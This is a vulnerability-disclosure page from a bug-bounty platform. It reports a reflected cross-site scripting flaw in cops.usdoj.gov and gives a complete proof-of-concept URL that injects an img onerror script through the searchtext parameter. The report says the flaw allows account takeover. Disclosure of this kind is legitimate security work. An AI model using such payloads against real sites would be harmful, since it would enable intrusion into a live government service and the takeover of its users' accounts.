Report Issues, Win Prizes
Report an Issue
Bug Bounties
Signup
Login
Chat with BLT Bot
×
We reply immediately
Send
Clear
Loading...
View this issue in:
v1
|
v2
|
v3
XSS in cops subdomain of US Department of Justice cops.usdoj.gov ,capable of User account takeover.
341
General
Number error
Functional
Performance
Security
Typo
Design
Save
Cancel
Domain:
https://cops.usdoj.gov/RIC/ric.php?page=searchrez&cmd=1&pagenum=0&sort=title-LH&searchtext=fffffff%22--%3E%3Cimg%20src=X%20onerror=alert(%27XSS%27);document.write(%27FEBIN_PWNED%27);%3E
Copy Title
0
Liked by:
0
Disliked by:
Flag 0
Flaged by:
Tweet
Share
Reported on cops.usdoj.gov
Total # of issues reported = 1
Subscribe to Usdoj bugs
Reported by febinrev
Total Points of febinrev = 320
Send a Tip
Browser Version: 68.0
Operating System: Linux
OS Version:
Bug Type:
Security
Status:
open
Added on:
Aug. 28, 2020, 2:11 p.m.
Github URL:
None
Github Issues URL:
None/issues
Description
Screenshots:
OCR Results:
OCR not installed
Comments:
No comment added yet. Be the first to comment!
v1.5